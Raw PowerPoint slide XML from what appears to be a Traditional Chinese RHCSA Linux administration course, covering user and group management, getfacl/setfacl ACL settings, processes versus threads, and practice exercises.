            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>連同家目錄一同刪除。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Bol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>群</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>組做刪除</a:t>
            </a:r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實作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0"/>
              <a:t>3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520560" y="901800"/>
              <a:ext cx="1695960" cy="12384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4720" y="838080"/>
                <a:ext cx="1727640" cy="1365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925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TW" altLang="en-US" dirty="0"/>
              <a:t>建立下列用戶、群組和組成成員：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>建立群組</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>sysadms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>建立用戶</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>natasha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>及將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>sysadms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>設定為次要群組</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>建立用戶</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>harry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>及將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>sysadms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>設定為次要群組</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>建立用戶</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>sarah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，設定無權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>登入系統，且不為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>sysadms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的成員</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>natasha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>harry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>sarah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的密碼皆設定為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>redhat</a:t>
            </a:r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/>
              <a:t>帳號</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>管理 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0"/>
              <a:t>RHCSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>實作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2227320" y="0"/>
              <a:ext cx="2097000" cy="21427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11480" y="-63360"/>
                <a:ext cx="2128680" cy="226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267200" y="5127120"/>
              <a:ext cx="6466320" cy="137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51360" y="5063760"/>
                <a:ext cx="6498000" cy="26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679320" y="5688720"/>
              <a:ext cx="1378440" cy="529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63480" y="5625360"/>
                <a:ext cx="141012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250040" y="2645280"/>
              <a:ext cx="1548360" cy="918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234200" y="2581560"/>
                <a:ext cx="158004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097280" y="3108960"/>
              <a:ext cx="490320" cy="19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81440" y="3045600"/>
                <a:ext cx="522000" cy="14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6746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400" dirty="0" err="1" smtClean="0"/>
              <a:t>getfacl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>指令可以查看某</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>檔案或目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>ACL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>項目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getfacl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檔案名稱或目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r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及目錄之</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0"/>
              <a:t>ACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>設定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27000" y="1530360"/>
              <a:ext cx="5220000" cy="957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11160" y="1467000"/>
                <a:ext cx="525204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6959520" y="1600200"/>
              <a:ext cx="121320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43680" y="1536840"/>
                <a:ext cx="12448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筆跡 6"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="666720" y="2038320"/>
              <a:ext cx="278172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50880" y="1974960"/>
                <a:ext cx="2813400" cy="159120"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="圖片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27000" y="3189621"/>
            <a:ext cx="5904656" cy="2875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115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14503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sz="3400" dirty="0" err="1"/>
              <a:t>setfacl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>指令可以設定某個目錄或檔案的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>ACL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>規範</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>setfacl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選項</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>檔案名稱或目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選項</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>-m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>設定一個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>ACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>規範</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>-x  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>取消一個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>ACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>規範</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>b  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>取消</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>acl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>參數設定</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>-d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t> 設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>預設</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>ACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>參數</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>只對目錄有效，該目錄新增的檔案都會套用本預設值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>針對個人 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>–m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>u:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>帳號名稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>: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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>檔案名稱及目錄</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>針對</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>群</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>組 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>-m g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>群組名稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>: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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>檔案名稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>目錄</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>針對</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>mask –m m:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>檔案名稱及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>目錄</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean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及目錄之</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0"/>
              <a:t>ACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>設定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895320" y="1523880"/>
              <a:ext cx="92736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79480" y="1460520"/>
                <a:ext cx="9590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898800" y="1511280"/>
              <a:ext cx="2299320" cy="450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82960" y="1447920"/>
                <a:ext cx="23310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6972480" y="1549440"/>
              <a:ext cx="831960" cy="1144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6280" y="1485720"/>
                <a:ext cx="864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" name="筆跡 4"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1306440" y="4996440"/>
              <a:ext cx="1299960" cy="3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90600" y="4933080"/>
                <a:ext cx="13316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筆跡 8"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2788920" y="4983480"/>
              <a:ext cx="2991960" cy="266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773080" y="4920120"/>
                <a:ext cx="302364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0" name="筆跡 9"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1358640" y="5349240"/>
              <a:ext cx="1084680" cy="331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42800" y="5285880"/>
                <a:ext cx="11163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1" name="筆跡 10"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2886840" y="5355720"/>
              <a:ext cx="2998440" cy="2160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871000" y="5292360"/>
                <a:ext cx="3030120" cy="34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2" name="筆跡 11"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1450080" y="5904360"/>
              <a:ext cx="1156320" cy="26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434240" y="5841000"/>
                <a:ext cx="118800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3" name="筆跡 12"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1913760" y="5721480"/>
              <a:ext cx="2652120" cy="1767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897920" y="5658120"/>
                <a:ext cx="2683800" cy="30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9020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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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89" y="1268760"/>
            <a:ext cx="8383125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89" y="3744818"/>
            <a:ext cx="8357293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450689" y="3239398"/>
            <a:ext cx="5396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設定資料夾</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(CUR)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>mask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>值為</a:t>
            </a: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--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407404" y="5859269"/>
            <a:ext cx="82690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設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>user:gy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>具有資料夾</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(CUR)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>下方檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(s2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>權限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47852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Program/Process/Thread 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差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</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7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en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Thread (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>執行緒、線程 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Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Thread </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的容器，在同一個 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>中會有很多個 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Thread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，例如多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>緒程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(Multithread)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，而每</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>一個 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Thread </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>負責某一項功能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3429000"/>
            <a:ext cx="2808312" cy="29416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936000" y="1435680"/>
              <a:ext cx="1250280" cy="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9800" y="1372320"/>
                <a:ext cx="12823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2428920" y="1564560"/>
              <a:ext cx="871920" cy="572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13080" y="1500840"/>
                <a:ext cx="9036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4172040" y="1628640"/>
              <a:ext cx="793080" cy="147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156200" y="1565280"/>
                <a:ext cx="82512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3214800" y="2128680"/>
              <a:ext cx="1229040" cy="860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198960" y="2065320"/>
                <a:ext cx="1260720" cy="21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1250280" y="2071440"/>
              <a:ext cx="1307520" cy="720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234440" y="2008080"/>
                <a:ext cx="13392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4729320" y="2085840"/>
              <a:ext cx="443160" cy="75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713120" y="2022480"/>
                <a:ext cx="47520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筆跡 11"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7508160" y="2050200"/>
              <a:ext cx="1443240" cy="216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492320" y="1986840"/>
                <a:ext cx="147492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筆跡 12"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1321560" y="2571840"/>
              <a:ext cx="3036600" cy="572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305720" y="2508120"/>
                <a:ext cx="30682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筆跡 13"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5786280" y="2485800"/>
              <a:ext cx="1414800" cy="147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770440" y="2422440"/>
                <a:ext cx="144684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筆跡 14"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1328760" y="2985840"/>
              <a:ext cx="2050560" cy="504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312920" y="2922480"/>
                <a:ext cx="208224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筆跡 15"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4079160" y="2979000"/>
              <a:ext cx="4536720" cy="72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063320" y="2915280"/>
                <a:ext cx="456840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筆跡 16"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1314360" y="3486240"/>
              <a:ext cx="371880" cy="3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298520" y="3422520"/>
                <a:ext cx="4035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筆跡 17"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3149640" y="2101680"/>
              <a:ext cx="889200" cy="259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3133800" y="2038320"/>
                <a:ext cx="920880" cy="15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356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以管理者身分建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>‘/pack’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>目錄，在目錄內新增兩個檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>‘page’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>paee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>讓使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>'us01'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>只可以進入目錄讀取檔案</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>讓使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>‘us02’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>可對目錄內的檔案做讀取及寫入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>讓使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>‘us03’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>只能讀取目錄內容檔案名稱，但是不可進入該目錄。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/>
              <a:t>ACL</a:t>
            </a:r>
            <a:r>
